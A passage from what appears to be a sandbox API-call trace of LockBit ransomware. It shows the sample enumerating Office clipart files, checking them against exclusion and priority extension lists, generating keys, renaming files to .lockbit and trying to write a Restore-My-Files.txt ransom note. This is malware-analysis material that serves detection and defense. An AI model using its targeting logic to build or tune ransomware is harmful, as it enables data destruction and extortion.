pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.895] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0142.897] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.897] malloc (_Size=0xa6) returned 0x77d7a8 [0142.898] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.899] free (_Block=0x77d7a8) [0142.899] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.899] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.899] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8379, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145168.JPG", cAlternateFileName="")) returned 1 [0142.899] lstrcmpiW (lpString1=".", lpString2="J0145168.JPG") returned -1 [0142.899] lstrcmpiW (lpString1="..", lpString2="J0145168.JPG") returned -1 [0142.899] PathFindExtensionW (pszPath="J0145168.JPG") returned=".JPG" [0142.899] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0142.899] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0142.899] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0142.900] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0142.900] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0142.901] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0142.901] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145168.JPG") returned 1 [0142.901] lstrcmpiW (lpString1="ntldr", lpString2="J0145168.JPG") returned 1 [0142.901] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145168.JPG") returned 1 [0142.902] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145168.JPG") returned -1 [0142.902] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145168.JPG") returned -1 [0142.902] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145168.JPG") returned 1 [0142.902] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145168.JPG") returned -1 [0142.902] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.902] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned=".JPG" [0142.902] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0142.902] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0142.902] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0142.902] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0142.902] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0142.902] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0142.902] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0142.903] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0142.903] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.lockbit") returned 72 [0142.903] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.904] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.904] malloc (_Size=0x40068) returned 0x3d70450 [0142.904] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=33657) returned 1 [0142.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0142.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0142.905] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.911] malloc (_Size=0xa6) returned 0x77d7a8 [0142.911] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.912] free (_Block=0x77d7a8) [0142.912] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.912] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.912] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xf0c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145212.JPG", cAlternateFileName="")) returned 1 [0142.912] lstrcmpiW (lpString1=".", lpString2="J0145212.JPG") returned -1 [0142.912] lstrcmpiW (lpString1="..", lpString2="J0145212.JPG") returned -1 [0142.912] PathFindExtensionW (pszPath="J0145212.JPG") returned=".JPG" [0142.912] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0142.912] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0142.913] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0142.913] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0142.914] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0142.914] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0142.915] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0142.915] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0142.915] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145212.JPG") returned 1 [0142.915] lstrcmpiW (lpString1="ntldr", lpString2="J0145212.JPG") returned 1 [0142.915] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145212.JPG") returned 1 [0142.915] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145212.JPG") returned -1 [0142.915] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145212.JPG") returned -1 [0142.915] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145212.JPG") returned 1 [0142.915] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145212.JPG") returned -1 [0142.915] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.915] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned=".JPG" [0142.915] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0142.915] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0142.915] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0142.915] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0142.916] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0142.916] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0142.917] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0142.917] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.lockbit") returned 72 [0142.917] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.923] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.923] malloc (_Size=0x40068) returned 0x3e70008 [0142.923] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=61633) returned 1 [0142.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0142.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0142.925] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.927] malloc (_Size=0xa6) returned 0x77d7a8 [0142.927] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.929] free (_Block=0x77d7a8) [0142.929] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.929] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.929] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc056, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145272.JPG", cAlternateFileName="")) returned 1 [0142.929] lstrcmpiW (lpString1=".", lpString2="J0145272.JPG") returned -1 [0142.929] lstrcmpiW (lpString1="..", lpString2="J0145272.JPG") returned -1 [0142.929] PathFindExtensionW (pszPath="J0145272.JPG") returned=".JPG" [0142.929] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0142.929] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0142.929] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0142.929] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0142.929] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0142.930] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0142.930] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0142.931] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0142.931] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145272.JPG") returned 1 [0142.931] lstrcmpiW (lpString1="ntldr", lpString2="J0145272.JPG") returned 1 [0142.931] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145272.JPG") 